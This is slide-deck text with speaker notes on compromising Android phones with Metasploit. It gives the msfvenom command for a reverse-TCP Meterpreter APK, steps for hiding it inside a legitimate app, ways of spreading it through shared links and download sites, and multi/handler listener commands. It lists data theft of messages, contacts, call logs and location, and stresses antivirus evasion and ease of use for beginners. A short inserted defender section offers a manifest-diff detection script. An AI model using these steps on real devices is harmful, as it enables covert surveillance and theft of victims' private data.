This document discusses using Meterpreter payloads in Metasploit to attack Android devices. It explains how to generate a Meterpreter payload using msfvenom, merge it with a legitimate app, install the payload on a target device, and use features like taking screenshots, retrieving messages and contacts to potentially take down a WhatsApp account. The document outlines setting up a listener with Metasploit to receive data from the payload after it has been installed on the target device.
3. METASPLOIT
• Metasploit Project
- computer security project
- security vulnerabilities
- penetration testing
• METASPLOIT FRAMEWORK (MSF)
- sub project
- a tool for developing and executing exploit code
4. PAYLOAD
A payload in Metasploit refers to an exploit module. There are three
different types of payload modules in the Metasploit Framework:
Singles, Stagers, and Stages. These different types allow for a great deal
of versatility and can be useful across numerous types of scenarios.
5. METERPRETER
• Meta-Interpreter
• dynamically extensible payload
• in-memory DLL injection stager
• resides completely in the memory of the remote host
• leaves no traces on the hard drive
6. GENERATING METERPRETER PAYLOAD IN MSF
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk
o Can be Encoded
o Platform independent
7. MERGING PAYLOAD WITH REAL APP
• Decompile
• Copy the payload files
• Inject the hook
• Recompile
• Sign
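A defender-side check for the repackaging steps above, as an added example that is not part of the original slides: it diffs the decoded AndroidManifest.xml of a trusted build against a suspect copy (for example, both decoded with `apktool d`) and reports permissions and components that only the suspect copy declares. The package and class names and both sample manifests are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Standard Android permissions gating SMS, contacts, call log, camera, location, microphone.
SENSITIVE = {"READ_SMS", "READ_CONTACTS", "READ_CALL_LOG", "CAMERA",
             "ACCESS_FINE_LOCATION", "RECORD_AUDIO"}
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

def manifest_facts(xml_text):
    """Return (permission short names, (tag, class) components) from a decoded manifest."""
    root = ET.fromstring(xml_text)
    perms = {e.get(ANDROID_NS + "name", "").rsplit(".", 1)[-1]
             for e in root.iter("uses-permission")}
    comps = {(e.tag, e.get(ANDROID_NS + "name", ""))
             for tag in COMPONENT_TAGS for e in root.iter(tag)}
    return perms, comps

def repackaging_report(trusted_xml, suspect_xml):
    """Report what the suspect manifest declares beyond the trusted build."""
    t_perms, t_comps = manifest_facts(trusted_xml)
    s_perms, s_comps = manifest_facts(suspect_xml)
    added_perms = s_perms - t_perms
    added_comps = s_comps - t_comps
    return {
        "added_permissions": sorted(added_perms),
        "added_sensitive": sorted(added_perms & SENSITIVE),
        "added_components": sorted(added_comps),
        "suspicious": bool(added_perms & SENSITIVE) or bool(added_comps),
    }

# Constructed sample manifests (hypothetical app "com.example.notes").
HEADER = ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
          'package="com.example.notes">')
TRUSTED = HEADER + """
  <uses-permission android:name="android.permission.INTERNET"/>
  <application><activity android:name=".MainActivity"/></application>
</manifest>"""
SUSPECT = HEADER + """
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application>
    <activity android:name=".MainActivity"/>
    <service android:name="com.example.injected.BackgroundService"/>
    <receiver android:name="com.example.injected.BootReceiver"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    print(repackaging_report(TRUSTED, SUSPECT))
```

Because the final step re-signs the app, comparing the APK's signing certificate with the original publisher's is the stronger check; the manifest diff is useful when only the decoded files are at hand.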
8. GETTING PAYLOAD INSTALLED IN TARGET DEVICE
• simply share the payload embedded app
• uploading the apk into external download sites
[Diagram labels: Attacker, Target Device, Cloud Storage]
9. FEATURES
• Take a snapshot
• Retrieve messages
• Retrieve contacts
• Retrieve Call logs
• Locate the target
• And lots more….
[Diagram labels: Target Device, Attacker's PC with MSF]
10. ATTACKING THE TARGET
Generate a listener:
use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.13
LHOST => 192.168.1.13
msf exploit(handler) > exploit
#4: MSF is open source. It is available for Linux and Windows, but the most popular way of using it is through Kali Linux. Kali has all the other tools needed for further attacks, and MSF comes pre-installed on it.
#6: The stager is what's sent to the target device. This makes it hard for AV programs to detect it. The stage is then downloaded and run by the stager on the target device.
#7: This is MSF's command for automatically generating a payload. With it, even beginners can generate a payload.
#8: After these steps, the payload is injected into the app such that the user can't identify it.
#11: The above commands set up the listener, which communicates with the payload.